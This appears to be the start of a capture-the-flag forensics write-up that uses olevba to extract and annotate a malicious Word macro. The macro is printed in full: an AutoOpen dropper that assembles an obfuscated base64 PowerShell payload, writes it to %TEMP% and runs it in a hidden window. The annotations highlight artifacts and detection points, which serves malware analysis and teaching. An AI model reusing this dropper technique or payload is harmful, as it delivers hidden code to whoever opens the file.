Halloween Invitation
We are given a ZIP archive that contains a single file named invitation.docm:
$ unzip -l forensics_halloween_invitation.zip
Archive: forensics_halloween_invitation.zip
Length Date Time Name
--------- ---------- ----- ----
5252634 10-12-2022 08:04 invitation.docm
--------- -------
5252634 1 file
$ unzip forensics_halloween_invitation.zip
Archive: forensics_halloween_invitation.zip
inflating: invitation.docm
$ file invitation.docm
invitation.docm: Microsoft Word 2007+
VBA macro extraction
This means that we have a Microsoft Word document with VBA macros. Instead of opening the document in Microsoft Word (which would run its AutoOpen macro), we can use olevba from oletools to extract the VBA code without executing it:
$ olevba invitation.docm
olevba 0.60.1 on Python 3.10.8 - http://decalage.info/python/oletools
===============================================================================
FILE: invitation.docm
Type: OpenXML
WARNING For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Entry point of the dropper. Word runs AutoOpen automatically when the
' document is opened (olevba flags it as AutoExec in the summary table below).
' The work is split into two stages implemented in this module.
Sub AutoOpen()
' Stage 1: decode the embedded payload and write it to %TEMP%\history.bak.
odhsjwpphlxnb
' Stage 2: read that file back and launch it via "powershell -e".
Call lmavedb
End Sub
' Stage 1 of the dropper: decodes the embedded payload and writes it to
' %TEMP%\history.bak. Every literal used here is stored as a hex string and
' decoded at run time by uxdufnkjlialsyp (Module1), so strings such as
' "Scripting.FileSystemObject" and "\history.bak" never appear in clear
' text in the macro source.
Private Sub odhsjwpphlxnb()
Dim bnhupraoau As String
' Creates a WScript.Shell object only to point its current directory at
' %TEMP%; the object is not kept. The drop path below is taken from Environ directly.
CreateObject("WScript.Shell").currentdirectory = Environ("TEMP")
' Fully decoded payload string; this is what lmavedb later hands to "powershell -e".
bnhupraoau = sryivxjsdncj()
' dropPath, rxnnvnfqufrzqfhnff and dfdjqgaqhvxxi are never declared (no Option Explicit).
dropPath = Environ("TEMP")
' "53637269707469" & "6e672e46696c6553797374656d4f626a656374" decode to "Scripting.FileSystemObject".
Set rxnnvnfqufrzqfhnff = CreateObject(uxdufnkjlialsyp("53637269707469") & uxdufnkjlialsyp("6e672e46696c6553797374656d4f626a656374"))
' "5c68697374" & "6f72792e62616b" decode to "\history.bak"; the True argument
' overwrites an existing file. Host artifact for responders: a text file
' %TEMP%\history.bak created by the Word process shortly after the document opens.
Set dfdjqgaqhvxxi = rxnnvnfqufrzqfhnff.CreateTextFile(dropPath & uxdufnkjlialsyp("5c68697374") & uxdufnkjlialsyp("6f72792e62616b"), True)
dfdjqgaqhvxxi.Write bnhupraoau
dfdjqgaqhvxxi.Close
End Sub
' Second decoding layer: turns a space-separated list of decimal character
' codes into the string of those characters, e.g. "74 65 66 122" -> "JABz".
' strBytes: the decimal-code list (already hex-decoded by the caller).
' Returns the decoded string.
Private Function wdysllqkgsbzs(strBytes) As String
Dim aNumbers
Dim fxnrfzsdxmcvranp As String
Dim iIter
fxnrfzsdxmcvranp = ""
' Split with no delimiter argument splits on single spaces.
aNumbers = Split(strBytes)
For iIter = LBound(aNumbers) To UBound(aNumbers)
' Chr() of each code; "+" between Strings concatenates here.
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + Chr(aNumbers(iIter))
Next
wdysllqkgsbzs = fxnrfzsdxmcvranp
End Function
' Reassembles the payload from 55 fragments. Each line concatenates two
' hex-encoded pieces (decoded by uxdufnkjlialsyp into a space-separated list
' of decimal character codes) and then maps those codes to characters via
' wdysllqkgsbzs. The split points fall in the middle of numbers (e.g.
' "...74 1" + "19 65..." -> "74 119 65"), so neither the hex form nor the
' decimal form of a single piece yields a searchable string on its own.
' The first codes (74 65 66 122 65 68 48 65 ...) decode to "JABzAD0A...",
' the usual base64 shape of a UTF-16LE PowerShell command, which matches the
' "-e" switch used in lmavedb. Returns the complete decoded payload string.
Private Function okbzichkqtto() As String
Dim fxnrfzsdxmcvranp As String
fxnrfzsdxmcvranp = ""
' Fragment 1 of 55; all following lines append in the same way.
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3734203635203636203132322036352036382034382036352037342031") & uxdufnkjlialsyp("31392036352035312036352036382039392036352037362031303320363520353120363520363820383120363520373620313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313230203635203638203130") & uxdufnkjlialsyp("37203635203739203635203635203131372036352036382038352036352037372031303320363520353420363520363820313033203635203737203635203635203532"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203638203635203635203734") & uxdufnkjlialsyp("20313139203635203535203635203637203831203635203937203831203635203537203635203637203939203635203930203635203635203438203635203638203737"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203839203130332036362031303620363520373120373720363520373820313033203636203130372036352036") & uxdufnkjlialsyp("37203438203635203737203635203635203438203635203638203737203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203132312036352036382038312036352037372036352036352035") & uxdufnkjlialsyp("33203635203637203438203635203738203131392036362031303820363520373120363920363520373720313033203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313232203635203731203639203635203737203130332036362031303620363520363720393920363520373920313139203635203130372036352037322036352036352038302038312036352031") & uxdufnkjlialsyp("3130203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373120313033203635203130302036352036362034382036352037322036352036352037392031303320") & uxdufnkjlialsyp("36352031313820363520363720353620363520373420313139203635203535203635203637203831"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352031303020313033203635203537203635203639203130372036352039382031303320363620353020363520373120353620363520393720313139203636203130382036352036372034") & uxdufnkjlialsyp("38203635203835"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31303320363620313038203635203732203737203635203130302036352036362037382036352037312038352036352031303020363520363620313131203635203731203536203635203930") & uxdufnkjlialsyp("203635203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203637203438203635203836203831203636203132322036352037312038") & uxdufnkjlialsyp("35203635203831203130332036362031303420363520373220373720363520393720383120363620313036203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373020363520363520383920383120363620313231203635203732203737203635203937203831203636") & uxdufnkjlialsyp("2031313720363520373120393920363520373320363520363520313136203635203730203835203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3939203130332036362031313220363520363720363520363520373420363520363620313139203635203637203831203635203939203131392036352031313820") & uxdufnkjlialsyp("3635203731203831203635203738203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313232203635203731203733203635") & uxdufnkjlialsyp("20383920313139203636203130362036352036382038392036352039302036352036352031303320363520363720343820363520383320363520363620313038"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352037312036392036352039302036352036362031303820363520373220373320363520393920313139203635") & uxdufnkjlialsyp("20313033203635203639203635203635203130312031313920363520313035203635203639"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363920363520313030203831203636203438203635203731203130332036352039") & uxdufnkjlialsyp("38203131392036362031323120363520373120313037203635203130312031303320363620313034203635203732203831"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520393720383120363620") & uxdufnkjlialsyp("313138203635203731203532203635203733203130332036352035372036352036372038312036352039372038312036362035372036352036382031313520363520313030"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313139203636203131312036352037312031303720363520393820363520363620313038") & uxdufnkjlialsyp("2036352036372036352036352037352036352036352031303720363520373220383120363520393920313033203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("34392036352037312038352036352037352038312036362035352036352036372038312036352038392031313920363520353720363520363720313033203635203833203831203636203131") & uxdufnkjlialsyp("37203635203732"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392036352039382031313920363620313134203635203731203835203635203736203831203636203833") & uxdufnkjlialsyp("20363520373120383520363520393920313139203636203438203635203639203438203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036362034382036352037312031303320363520393820313139203636203130372036352036372036352036352037362038312036362038362036352037322037") & uxdufnkjlialsyp("37203635203930203831203636203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373120363920363520393920313139203636203131322036352037312037372036352038352036352036362031303420363520") & uxdufnkjlialsyp("37322037332036352039392031313920363620313132203635203731"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("35322036352039302031313920363520313033203635203637203438203635203836203831203636203132312036352037312031303720363520373320363520363520313037203635203732203635") & uxdufnkjlialsyp("203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37342036352036362031323220363520363720") & uxdufnkjlialsyp("35362036352037372036352036352034382036352036382037372036352039302031303320363520313231203635203638203831203635203737203635203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("353320363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635") & uxdufnkjlialsyp("2037312038352036352039392031303320363620313232203635203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352038312036352036362035352036352036372037332036352038") & uxdufnkjlialsyp("3120383120363620343920363520373220383120363520393720363520363620313138203635203732203733203635203937"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("383120363620353420363520373120363920363520") & uxdufnkjlialsyp("313030203635203636203131322036352037312035362036352039382031303320363520313035203635203638203438203635203734203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31313220363520373220343820363520") & uxdufnkjlialsyp("37352038312036352035352036352037312031303720363520393020313033203635203130332036352036372031303320363520373420363520363620313036203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3637") & uxdufnkjlialsyp("20363520363520373620383120363620313137203635203731203835203635203733203635203635203131302036352036392035322036352039382031313920363620313137203635203731203835"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373420313139203635203131322036352036372036352036352031303120313139203635203130372036352037322037332036352038302038312036362031313220363520") & uxdufnkjlialsyp("373120383520363520313031"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352031303320") & uxdufnkjlialsyp("363520363720383120363520383920313139203635203130332036352036372034382036352038322038312036362031323120363520373220373320363520393820313139203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352036392036392036352038392031313920363620343820363520373120313037203635203938203131392036362031313720363520") & uxdufnkjlialsyp("363720363520363520383520313139203636203438203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3731203536203635203939203635203635203130332036352036372034382036352038322038312036362031323120") & uxdufnkjlialsyp("36352037322037332036352039382031313920363620313231203635203730203839"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520383920383120363620313231203635203731203130372036352038392038") & uxdufnkjlialsyp("31203636203130352036352037312031313920363520393020383120363520313033203635203731203835203635203739"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036352031303720363520373220373320363520383020383120") & uxdufnkjlialsyp("3636203830203635203732203835203635203130302036352036352031313620363520373020373720363520313030203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352037") & uxdufnkjlialsyp("31203130372036352039382031303320363620313130203635203637203635203635203736203831203636203734203635203731203532203635203939203635203636203439203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37322038312036352038342031313920363620313035203635203731203131312036352039302038312036362031303620363520373220383120363520373320363520363520313037203635203732") & uxdufnkjlialsyp("203733"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203739203131392036352031303720363520373220383120363520383020383120363620") & uxdufnkjlialsyp("373420363520373120353220363520313030203130332036362031313820363520373120313135203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036352031313620363520373020373320363520393020383120363620313232203635203732203831203635203834203831203636203130") & uxdufnkjlialsyp("3820363520373220383120363520393720363520363620313138"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203731203831203635203733") & uxdufnkjlialsyp("20363520363520313136203635203730203835203635203939203130332036362031313220363520363720363520363520373420363520363620313139203635203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3831203635203939203131392036352031313820363520363820393920363520393020383120363620313034203635203638203733203635203737203131392036362031303420363520363820373320") & uxdufnkjlialsyp("3635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392031313920363520313033203635203637203438203635203834203831203636203130382036352037322038312036352039372036352036362031313820363520373120") & uxdufnkjlialsyp("3831203635203733203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363620383120") & uxdufnkjlialsyp("36352036392035362036352038352031313920363620383520363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312038352036352039392031303320363620313232203635203637203635203635203831203635203636203535") & uxdufnkjlialsyp("203635203637203733203635203831203831203636203439203635203732203831203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3937203635203636203131382036352037322037332036352039372038312036362035342036352037312036392036352031303020363520363620313132203635203731203536203635203938") & uxdufnkjlialsyp("20313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203130352036352036382034382036352037342036352036362031313220363520373220343820363520373320363520363520") & uxdufnkjlialsyp("3131362036352036392037332036352039382031313920363620313037"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373220") & uxdufnkjlialsyp("3130372036352037332036352036352031313120363520373020313135203635203835203131392036362035332036352037322037372036352031303020363520363620313038203635203731"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3438203635") & uxdufnkjlialsyp("203736203130332036362038352036352037312038352036352031303120363520363620343820363520363720353220363520383220383120363620313137203635203731203737203635203938"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036362031303720363520373120313037203635203938203130332036362031313020363520373020343820363520373920313033203635203534203635203730203835203635") & uxdufnkjlialsyp("203836203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312036352036382031303320363520373620313033203636203732203635203731") & uxdufnkjlialsyp("20383520363520313030203635203636203637203635203732203130372036352031303020363520363620313038203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3732203737203635203735203635203635203130372036352037312038352036352037352031313920363520313037203635203732203733203635203735203831203635") & uxdufnkjlialsyp("20313033203635203637203438"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352039372031303320363620") & uxdufnkjlialsyp("3131382036352037312031303720363520393820313033203635203130332036352036372039392036352037332036352036352031313020363520363720313037203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313032") & uxdufnkjlialsyp("20383120363520313033203635203732203737203635203938203635203636203130382036352037312038352036352039392036352036352031303320363520363820363520363520373620313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520353220363520373220343820363520383320363520363620") & uxdufnkjlialsyp("3835203635203639203733203635203130312031313920363520343920363520373220383520363520393920363520363520313232203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373220373320363520383820313139203635203132322036352036382038312036352037382038") & uxdufnkjlialsyp("31203636203533203635203730203536203635203938203831203635203438203635203731203737203635"))
' Last fragment; "3635203631" -> "65 61" -> "A=", the trailing base64 padding.
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("393920313033203635203131392036352036382038352036352031303220383120") & uxdufnkjlialsyp("3635203631"))
okbzichkqtto = fxnrfzsdxmcvranp
End Function
' Thin indirection layer: returns okbzichkqtto() unchanged (appended to an
' empty string). Adds nothing but one more hop between AutoOpen and the
' payload builder.
Private Function sryivxjsdncj() As String
Dim fxnrfzsdxmcvranp As String
fxnrfzsdxmcvranp = ""
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + okbzichkqtto()
sryivxjsdncj = fxnrfzsdxmcvranp
End Function
' Stage 2 of the dropper: reads the payload written by odhsjwpphlxnb back
' from %TEMP%\history.bak and executes it through PowerShell's encoded
' command switch. Unlike the helpers above it is not Private.
Sub lmavedb()
dropPath = Environ("TEMP")
' "536372697074696e672e46696c6553797374" & "656d4f626a656374" decode to "Scripting.FileSystemObject".
Set rxnnvnfqufrzqfhnff = CreateObject(uxdufnkjlialsyp("536372697074696e672e46696c6553797374") & uxdufnkjlialsyp("656d4f626a656374"))
' "5c68" & "6973746f72792e62616b" decode to "\history.bak" (split at a
' different point than in odhsjwpphlxnb, so the two hex forms never repeat).
Set ktmlmpc = rxnnvnfqufrzqfhnff.OpenTextFile(dropPath & uxdufnkjlialsyp("5c68") & uxdufnkjlialsyp("6973746f72792e62616b"))
' secret holds the whole base64 blob built by okbzichkqtto.
secret = ktmlmpc.ReadAll
ktmlmpc.Close
' -e is -EncodedCommand (base64 of a UTF-16LE script); -WindowStyle hidden
' keeps the console off screen. The literal ends in an escaped quote, so the
' command line opens a double quote before the blob and never closes it;
' presumably harmless since base64 contains no spaces, but keep it in mind
' when reconstructing the exact command line from process logs.
Code = "powershell -WindowStyle hidden -e """ & secret
' Shell with window style 1 (vbNormalFocus) starts the process; the returned
' task ID is stored in x and never used. Detection opportunity: the Word
' process spawning powershell.exe with -e and a hidden window immediately
' after creating %TEMP%\history.bak.
x = Shell(Code, 1)
End Sub
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' First decoding layer (Module1): converts a hex string into the characters
' it encodes, one character per hex pair ("5c68" -> "\h"). Every literal in
' ThisDocument goes through this so that no clear-text string survives a
' naive static scan; olevba still recovers them (see the Hex String rows below).
' tiyrahvbz: hex string, expected to have even length.
' Returns the decoded string. No input validation: a trailing odd character
' is decoded on its own and non-hex characters are silently accepted by Val.
Function uxdufnkjlialsyp(ByVal tiyrahvbz As String) As String
Dim nqjveawetp As Long
' Walk the string two characters at a time; the "&H" prefix makes Val parse the pair as hexadecimal.
For nqjveawetp = 1 To Len(tiyrahvbz) Step 2
uxdufnkjlialsyp = uxdufnkjlialsyp & Chr$(Val("&H" & Mid$(tiyrahvbz, nqjveawetp, 2)))
Next nqjveawetp
End Function
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |AutoOpen |Runs when the Word document is opened |
|Suspicious|Environ |May read system environment variables |
|Suspicious|Write |May write to a file (if combined with Open) |
|Suspicious|CreateTextFile |May create a text file |
|Suspicious|Shell |May run an executable file or a system |
| | |command |
|Suspicious|WScript.Shell |May run an executable file or a system |
| | |command |
|Suspicious|powershell |May run PowerShell commands |
|Suspicious|Call |May call a DLL using Excel 4 Macros (XLM/XLF)|
|Suspicious|CreateObject |May create an OLE object |
|Suspicious|Chr |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Hex String|Scripti |53637269707469 |
|Hex String|ng.FileSystemObject |6e672e46696c6553797374656d4f626a656374 |
|Hex String|\hist |5c68697374 |
|Hex String|ory.bak |6f72792e62616b |
|Hex String|74 65 66 122 65 68 |373420363520363620313232203635203638203438203|
| |48 65 74 1 |6352037342031 |
|Hex String|19 65 51 65 68 99 65|313920363520353120363520363820393920363520373|
| |76 103 65 51 65 68 |620313033203635203531203635203638203831203635|
| |81 65 76 103 |20373620313033 |
|Hex String|65 120 65 68 10 |363520313230203635203638203130 |
|Hex String|7 65 79 65 65 117 65|372036352037392036352036352031313720363520363|
| |68 85 65 77 103 65 |820383520363520373720313033203635203534203635|
| |54 65 68 103 65 77 |20363820313033203635203737203635203635203532 |
| |65 65 52 | |
|Hex String|65 68 65 65 74 |3635203638203635203635203734 |
|Hex String| 119 65 55 65 67 81 |203131392036352035352036352036372038312036352|
| |65 97 81 65 57 65 67|039372038312036352035372036352036372039392036|
| |99 65 90 65 65 48 65|35203930203635203635203438203635203638203737 |
| |68 77 | |
|Hex String|65 89 103 66 106 65 |363520383920313033203636203130362036352037312|
| |71 77 65 78 103 66 |037372036352037382031303320363620313037203635|
| |107 65 6 |2036 |
|Hex String|7 48 65 77 65 65 48 |372034382036352037372036352036352034382036352|
| |65 68 77 65 90 |03638203737203635203930 |
|Hex String|103 65 121 65 68 81 |313033203635203132312036352036382038312036352|
| |65 77 65 65 5 |037372036352036352035 |
|Hex String|3 65 67 48 65 78 119|332036352036372034382036352037382031313920363|
| |66 108 65 71 69 65 |620313038203635203731203639203635203737203130|
| |77 103 65 |33203635 |
|Hex String|122 65 71 69 65 77 |313232203635203731203639203635203737203130332|
| |103 66 106 65 67 99 |036362031303620363520363720393920363520373920|
| |65 79 119 65 107 65 |313139203635203130372036352037322036352036352|
| |72 65 65 80 81 65 1 |038302038312036352031 |
|Hex String|10 65 |3130203635 |
|Hex String|71 103 65 100 65 66 |373120313033203635203130302036352036362034382|
| |48 65 72 65 65 79 |036352037322036352036352037392031303320 |
| |103 | |
|Hex String|65 118 65 67 56 65 |363520313138203635203637203536203635203734203|
| |74 119 65 55 65 67 |13139203635203535203635203637203831 |
| |81 | |
|Hex String|65 100 103 65 57 65 |363520313030203130332036352035372036352036392|
| |69 107 65 98 103 66 |031303720363520393820313033203636203530203635|
| |50 65 71 56 65 97 |203731203536203635203937203131392036362031303|
| |119 66 108 65 67 4 |82036352036372034 |
|Hex String|8 65 85 |38203635203835 |
|Hex String|103 66 108 65 72 77 |313033203636203130382036352037322037372036352|
| |65 100 65 66 78 65 |031303020363520363620373820363520373120383520|
| |71 85 65 100 65 66 |363520313030203635203636203131312036352037312|
| |111 65 71 56 65 90 |03536203635203930 |
|Hex String| 65 65 |203635203635 |
|Hex String|103 65 67 48 65 86 |313033203635203637203438203635203836203831203|
| |81 66 122 65 71 8 |636203132322036352037312038 |
|Hex String|5 65 81 103 66 104 |352036352038312031303320363620313034203635203|
| |65 72 77 65 97 81 66|732203737203635203937203831203636203130362036|
| |106 65 |35 |
|Hex String|70 65 65 89 81 66 |373020363520363520383920383120363620313231203|
| |121 65 72 77 65 97 |635203732203737203635203937203831203636 |
| |81 66 | |
|Hex String| 117 65 71 99 65 73 |203131372036352037312039392036352037332036352|
| |65 65 116 65 70 85 |0363520313136203635203730203835203635 |
| |65 | |
|Hex String|99 103 66 112 65 67 |393920313033203636203131322036352036372036352|
| |65 65 74 65 66 119 |036352037342036352036362031313920363520363720|
| |65 67 81 65 99 119 |3831203635203939203131392036352031313820 |
| |65 118 | |
|Hex String|65 71 81 65 78 65 |3635203731203831203635203738203635 |
|Hex String|65 122 65 71 73 65 |363520313232203635203731203733203635 |
|Hex String| 89 119 66 106 65 68|203839203131392036362031303620363520363820383|
| |89 65 90 65 65 103 |920363520393020363520363520313033203635203637|
| |65 67 48 65 83 65 66|20343820363520383320363520363620313038 |
| |108 | |
|Hex String|65 71 69 65 90 65 66|363520373120363920363520393020363520363620313|
| |108 65 72 73 65 99 |038203635203732203733203635203939203131392036|
| |119 65 |35 |
|Hex String| 103 65 69 65 65 101|203130332036352036392036352036352031303120313|
| |119 65 105 65 69 |13920363520313035203635203639 |
|Hex String|69 65 100 81 66 48 |363920363520313030203831203636203438203635203|
| |65 71 103 65 9 |731203130332036352039 |
|Hex String|8 119 66 121 65 71 |382031313920363620313231203635203731203130372|
| |107 65 101 103 66 |036352031303120313033203636203130342036352037|
| |104 65 72 81 |32203831 |
|Hex String|65 97 81 66 |363520393720383120363620 |
|Hex String|118 65 71 52 65 73 |313138203635203731203532203635203733203130332|
| |103 65 57 65 67 81 |036352035372036352036372038312036352039372038|
| |65 97 81 66 57 65 68|312036362035372036352036382031313520363520313|
| |115 65 100 |030 |
|Hex String|119 66 111 65 71 107|313139203636203131312036352037312031303720363|
| |65 98 65 66 108 |520393820363520363620313038 |
|Hex String| 65 67 65 65 75 65 |203635203637203635203635203735203635203635203|
| |65 107 65 72 81 65 |130372036352037322038312036352039392031303320|
| |99 103 66 |3636 |
|Hex String|49 65 71 85 65 75 81|343920363520373120383520363520373520383120363|
| |66 55 65 67 81 65 89|620353520363520363720383120363520383920313139|
| |119 65 57 65 67 103 |203635203537203635203637203130332036352038332|
| |65 83 81 66 11 |03831203636203131 |
|Hex String|7 65 72 |37203635203732 |
|Hex String|89 65 98 119 66 114 |383920363520393820313139203636203131342036352|
| |65 71 85 65 76 81 66|03731203835203635203736203831203636203833 |
| |83 | |
|Hex String| 65 71 85 65 99 119 |203635203731203835203635203939203131392036362|
| |66 48 65 69 48 65 90|03438203635203639203438203635203930 |
|Hex String|81 66 48 65 71 103 |383120363620343820363520373120313033203635203|
| |65 98 119 66 107 65 |938203131392036362031303720363520363720363520|
| |67 65 65 76 81 66 86|36352037362038312036362038362036352037322037 |
| |65 72 7 | |
|Hex String|7 65 90 81 66 67 |37203635203930203831203636203637 |
|Hex String|65 71 69 65 99 119 |363520373120363920363520393920313139203636203|
| |66 112 65 71 77 65 |131322036352037312037372036352038352036352036|
| |85 65 66 104 65 |362031303420363520 |
|Hex String|72 73 65 99 119 66 |373220373320363520393920313139203636203131322|
| |112 65 71 |03635203731 |
|Hex String|52 65 90 119 65 103 |353220363520393020313139203635203130332036352|
| |65 67 48 65 86 81 66|036372034382036352038362038312036362031323120|
| |121 65 71 107 65 73 |363520373120313037203635203733203635203635203|
| |65 65 107 65 72 65 |13037203635203732203635 |
|Hex String|74 65 66 122 65 67 |37342036352036362031323220363520363720 |
|Hex String|56 65 77 65 65 48 65|353620363520373720363520363520343820363520363|
| |68 77 65 90 103 65 |820373720363520393020313033203635203132312036|
| |121 65 68 81 65 77 |35203638203831203635203737203635203635 |
| |65 65 | |
|Hex String|53 65 67 65 65 76 81|353320363520363720363520363520373620383120363|
| |66 73 65 71 85 65 89|620373320363520373120383520363520383920383120|
| |81 66 107 65 |363620313037203635 |
|Hex String| 71 85 65 99 103 66 |203731203835203635203939203130332036362031323|
| |122 65 67 |2203635203637 |
|Hex String|65 65 81 65 66 55 65|363520363520383120363520363620353520363520363|
| |67 73 65 8 |72037332036352038 |
|Hex String|1 81 66 49 65 72 81 |312038312036362034392036352037322038312036352|
| |65 97 65 66 118 65 |039372036352036362031313820363520373220373320|
| |72 73 65 97 |3635203937 |
|Hex String|81 66 54 65 71 69 65|383120363620353420363520373120363920363520 |
|Hex String|100 65 66 112 65 71 |313030203635203636203131322036352037312035362|
| |56 65 98 103 65 105 |036352039382031303320363520313035203635203638|
| |65 68 48 65 74 65 66|203438203635203734203635203636 |
|Hex String|112 65 72 48 65 |31313220363520373220343820363520 |
|Hex String|75 81 65 55 65 71 |373520383120363520353520363520373120313037203|
| |107 65 90 103 65 103|635203930203130332036352031303320363520363720|
| |65 67 103 65 74 65 |31303320363520373420363520363620313036203635 |
| |66 106 65 | |
|Hex String| 65 65 76 81 66 117 |203635203635203736203831203636203131372036352|
| |65 71 85 65 73 65 65|037312038352036352037332036352036352031313020|
| |110 65 69 52 65 98 |363520363920353220363520393820313139203636203|
| |119 66 117 65 71 85 |13137203635203731203835 |
